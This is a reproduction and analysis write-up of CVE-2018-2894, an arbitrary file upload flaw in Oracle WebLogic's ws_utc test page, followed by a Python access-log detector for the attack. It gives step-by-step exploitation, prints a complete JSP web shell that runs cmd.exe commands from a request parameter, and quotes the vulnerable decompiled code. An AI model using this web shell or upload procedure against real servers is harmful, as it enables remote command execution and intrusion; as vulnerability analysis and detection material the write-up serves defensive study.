CVE-2018-2894
Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3
Test environment (WebLogic 12.2.1.3 quick installer): http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip
Vulnerability reproduction
After the service starts, access http://localhost:7001/ws_utc/config.do
The current working directory (Work Home Dir) can be changed to a different directory. In a local environment it can be set, for example, to the web directory where the application is deployed: C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war
Next, select the Security (安全) tab, add a JKS Keystore and upload the file. Assume the uploaded chybeta.jsp is the following:
    <%@ page import="java.util.*,java.io.*,java.net.*" %>
    <HTML><BODY>
    <FORM METHOD="POST" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <%
    if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
        Process p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
    %>
    </pre>
    </BODY></HTML>
Capture the upload request to obtain the timestamp 1531987145013; the uploaded file is then located at config\keystore\1531987145013_chybeta.jsp.
Access http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp
Brief vulnerability analysis
In ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59:

    public void changeWorkDir(String path) {
        String[] oldPaths = this.getRelatedPaths();
        if (this.testPageProvider.getWsImplType() == ImplType.JRF) {
            this.isWorkDirChangeable = false;
            this.isWorkDirWritable = isDirWritable(path);
            this.isWorkDirChangeable = true;
            this.setTestClientWorkDir(path);
        } else {
            this.persistWorkDir(path);
            this.init();
        }
        if (this.isWorkDirWritable) {
            String[] newPaths = this.getRelatedPaths();
            moveDirs(oldPaths, newPaths);
        } else {
            logger.fine("[INFO] newly specified testclient working Dir is readonly. Won't move the configuration stuff to new path.");
        }
    }

This function changes the working directory, but it performs no checks on the new path.
In ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181:

    @Path("/keystore")
    @POST
    @Produces({"application/xml", "application/json"})
    @Consumes({"multipart/form-data"})
    public Response editKeyStoreSettingByMultipart(FormDataMultiPart formPartParams) {
        if (!RequestUtil.isRequstedByAdmin(this.request)) {
            return Response.status(Status.FORBIDDEN).build();
        } else {
            if (TestClientRT.isVerbose()) {
                logger.fine("calling SettingResource.addKeyStoreSettingByMultipart");
            }
            // the current time in milliseconds becomes the file name prefix
            String currentTimeValue = "" + (new Date()).getTime();
            KeyValuesMap<String, String> formParams = RSDataHelper.getInstance()
                    .convertFormDataMultipart(formPartParams, true, TestClientRT.getKeyStorePath(), currentTimeValue);
            ...
        }
    }
Following getKeyStorePath in ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31:

    public static String getKeyStorePath() {
        // the "keystore" subdirectory of the config directory
        return getConfigDir() + File.separator + "keystore";
    }

This yields the storePath that the upload is written to.
In ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145:

    public KeyValuesMap<String, String> convertFormDataMultipart(FormDataMultiPart formPartParams, boolean isExtactAttachment, String storePath, String fileNamePrefix) {
        ...
        if (attachName != null && attachName.trim().length() > 0) {
            if (attachName != null && attachName.trim().length() != 0) {
                attachName = this.refactorAttachName(attachName);
                if (fileNamePrefix == null) {
                    fileNamePrefix = key;
                }
                String fileName = (new File(storePath, fileNamePrefix + "_" + attachName)).getAbsolutePath();
                kvMap.put(key, fileName);
                if (isExtactAttachment) {
                    // the method that writes the attachment is not recoverable from the extracted
                    // page; "saveAttachment" is a placeholder for its name
                    this.saveAttachment(fileName, bodyPart.getEntityAs(InputStream.class));
                }
            }
        }
        ...
    }

The contents of the uploaded file are written into the storePath directory under the name fileNamePrefix + "_" + attachName. This process performs no filtering or checking of the file name or contents :) ...
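From the defender's side, the naming scheme just described (epoch milliseconds, an underscore, the original attachment name, written under ws_utc/config/keystore) makes the upload and the later request for the file easy to spot in the access log. The following is an added example, not part of the original write-up: it scans constructed WebLogic access-log lines (the log format and sample addresses are assumptions) for keystore uploads and for requests to executable files under the keystore directory, and correlates the two by source address.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (common log format as WebLogic writes it by
# default); the addresses, times and sizes are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jul/2018:15:59:05 +0800] "POST /ws_utc/config/keystore HTTP/1.1" 200 312
10.0.0.5 - - [19/Jul/2018:15:59:10 +0800] "GET /ws_utc/config/keystore/1531987145013_chybeta.jsp HTTP/1.1" 200 87
10.0.0.7 - - [19/Jul/2018:16:01:00 +0800] "GET /ws_utc/config.do HTTP/1.1" 200 5120
10.0.0.9 - - [19/Jul/2018:16:02:00 +0800] "GET /ws_utc/config/keystore/1531987200000_client.jks HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Files written by the keystore upload are named <13-digit epoch millis>_<attachName>.
KEYSTORE_FILE_RE = re.compile(r'^/ws_utc/config/keystore/(\d{13})_([^/]+)$')
# A keystore should be a .jks/.p12; a server-side script under that directory is suspect.
EXEC_EXT = ('.jsp', '.jspx')

@dataclass
class Finding:
    ip: str
    kind: str
    path: str

def scan(log_text):
    """Return one Finding per keystore upload and per request to an executable keystore file."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = m.group('path').split('?', 1)[0]  # ignore any query string
        if m.group('method') == 'POST' and path == '/ws_utc/config/keystore':
            findings.append(Finding(m.group('ip'), 'keystore-upload', path))
        km = KEYSTORE_FILE_RE.match(path)
        if km and km.group(2).lower().endswith(EXEC_EXT):
            findings.append(Finding(m.group('ip'), 'keystore-exec-access', path))
    return findings

def correlate(findings):
    """Executable-file accesses from an address that also performed a keystore upload."""
    uploaders = {f.ip for f in findings if f.kind == 'keystore-upload'}
    return [f for f in findings if f.kind == 'keystore-exec-access' and f.ip in uploaders]

if __name__ == '__main__':
    for f in correlate(scan(SAMPLE_LOG)):
        print(f"{f.ip} uploaded a keystore and then requested {f.path}")
```

Legitimate keystore uploads (the .jks line) and plain visits to config.do produce no finding; only the script under the keystore directory is reported.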
Conditions:
- The web directory where the application is deployed must be known.
- ws_utc/config.do requires no authentication in development mode, but does require authentication in production mode. See Oracle Fusion Middleware Administering Web Services for details.
WebLogic arbitrary file upload vulnerability reproduction and analysis (CVE-2018-2894)